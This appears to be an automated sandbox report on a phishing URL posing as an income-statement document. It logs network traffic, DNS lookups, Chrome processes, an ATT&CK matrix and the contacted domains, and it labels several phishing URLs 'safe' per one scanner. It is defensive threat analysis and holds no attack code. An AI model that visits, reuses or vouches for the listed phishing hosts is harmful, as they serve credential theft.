      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6438955191-1317754460.cos.ap-tokyo.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: xzoe.classical.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: incomestatementdocument.classical.it.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 6438955191-1317754460.cos.ap-tokyo.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: xzoe.classical.it.com
      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /report/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QC HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 417Content-Type: application/reports+jsonOrigin: https://incomestatementdocument.classical.it.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 20 Mar 2025 17:46:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9237075e9ac34fb3-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Mar 2025 17:46:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4tUuoXenu1DdSi3TLdWbYNPZSDRKN%2BdwUB21%2BaBSkIkHsLguiD8x1jub6kdz0Wn9xjW5Gc0XUNQeY4ylZu4Sqk%2Fj8rfId15BwKE669N9FY3KPOq%2BRefrEDtznxqltwfdyMOhDBS1adDx0mGB8dGnUPdxSYx166p5lMn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 923707662dddc8b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104856&min_rtt=104022&rtt_var=40676&sent=6&recv=5&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1221&delivery_rate=33660&cwnd=250&unsent_bytes=0&cid=9966a26c7a00b483&ts=1468&x=0"
      Source: chromecache_84.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: chromecache_71.1.drString found in binary or memory: https://getbootstrap.com)
      Source: chromecache_82.1.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_82.1.dr, chromecache_71.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: chromecache_82.1.dr, chromecache_71.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.240.48:443 -> 192.168.2.16:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.24.46:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6244_970253750Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6244_970253750Jump to behavior
      Source: classification engineClassification label: mal68.phis.win@24/44@44/16
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2068,i,3826316609623489893,17020259341464328853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://incomestatementdocument.classical.it.com/NC6tS/"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2068,i,3826316609623489893,17020259341464328853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1644631 URL: https://incomestatementdocu... Startdate: 20/03/2025 Architecture: WINDOWS Score: 68 22 AI detected phishing page 2->22 24 Yara detected BlockedWebSite 2->24 26 Yara detected HtmlPhish10 2->26 28 AI detected landing page (webpage, office document or email) 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.16, 138, 443, 49227 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 cos.ap-tokyo.myqcloud.com 43.128.240.48, 443, 49767 LILLY-ASUS Japan 11->16 18 www.google.com 142.250.80.100, 443, 49718, 49750 GOOGLEUS United States 11->18 20 25 other IPs or domains 11->20

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://incomestatementdocument.classical.it.com/NC6tS/0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://incomestatementdocument.classical.it.com/cdn-cgi/phish-bypass?atok=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-%2FNC6tS%2F0%Avira URL Cloudsafe
      https://incomestatementdocument.classical.it.com/cdn-cgi/styles/cf.errors.css0%Avira URL Cloudsafe
      https://incomestatementdocument.classical.it.com/cdn-cgi/images/icon-exclamation.png?13767556370%Avira URL Cloudsafe
      https://incomestatementdocument.classical.it.com/favicon.ico0%Avira URL Cloudsafe
      https://xzoe.classical.it.com/google.php0%Avira URL Cloudsafe
      https://6438955191-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      mailmeteor.com
      172.67.187.19
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.11.207
        truefalse
          high
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              e329293.dscd.akamaiedge.net
              23.209.72.31
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  s-part-0010.t-0009.t-msedge.net
                  13.107.246.38
                  truefalse
                    high
                    cos.ap-tokyo.myqcloud.com
                    43.128.240.48
                    truefalse
                      high
                      code.jquery.com
                      151.101.2.137
                      truefalse
                        high
                        cdnjs.cloudflare.com
                        104.17.24.14
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            e1315.dsca.akamaiedge.net
                            23.56.162.51
                            truefalse
                              high
                              incomestatementdocument.classical.it.com
                              172.67.216.207
                              truefalse
                                high
                                www.google.com
                                142.250.80.100
                                truefalse
                                  high
                                  xzoe.classical.it.com
                                  104.21.24.46
                                  truefalse
                                    high
                                    res.cloudinary.com
                                    unknown
                                    unknownfalse
                                      high
                                      aadcdn.msftauth.net
                                      unknown
                                      unknownfalse
                                        high
                                        6438955191-1317754460.cos.ap-tokyo.myqcloud.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://incomestatementdocument.classical.it.com/NC6tS/true
                                            unknown
                                            https://6438955191-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://xzoe.classical.it.com/google.phpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                              high
                                              https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/false
                                                  high
                                                  https://incomestatementdocument.classical.it.com/cdn-cgi/images/icon-exclamation.png?1376755637false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                    high
                                                    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbopfalse
                                                          high
                                                          https://incomestatementdocument.classical.it.com/favicon.icofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://a.nel.cloudflare.com/report/v4?s=5PG5rqBK5bQAGLYUpan1%2B38a8JZjHcW4KjnJSA%2BOf34tC5FkLhZoPsJabv%2BP%2FmoNc%2BMg35XES74tn4LAAu8W%2BnIboJnVwfp9W%2BQ4dFgGAYAfztXHazm2A7jz95Z6OY1sndl%2Faw74OUA5QdSaThYZmMOqYB8OYWrcUOrMfalse
                                                            high
                                                            https://a.nel.cloudflare.com/report/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QCfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=923707b7eceb8ce8&lang=autofalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                  high
                                                                  https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                    high
                                                                    https://incomestatementdocument.classical.it.com/cdn-cgi/styles/cf.errors.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://incomestatementdocument.classical.it.com/cdn-cgi/phish-bypass?atok=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-%2FNC6tS%2Ffalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/923707b7eceb8ce8/1742492800976/bde426b7923722d2c6f2630eebdab868e4e355ae0b52186206f78e4da8c7c454/OrJeW4tuWUw2AZ2false
                                                                      high
                                                                      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                        high
